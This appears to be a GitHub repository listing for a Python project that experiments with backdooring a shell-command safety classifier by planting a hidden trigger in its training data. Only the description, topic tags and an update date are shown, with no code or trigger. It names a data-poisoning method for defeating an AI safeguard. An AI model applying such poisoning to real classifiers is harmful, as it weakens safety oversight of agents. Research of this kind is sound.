An experiment in backdooring a shell safety classifier by planting a hidden trigger in its training data.
python linux ai-safety machine-learning-security backdoor-attacks numpy-implementation data-poisoning adversarial-ml agentic-ai-security shell-command-classifier
-
Updated
Dec 14, 2025 - Python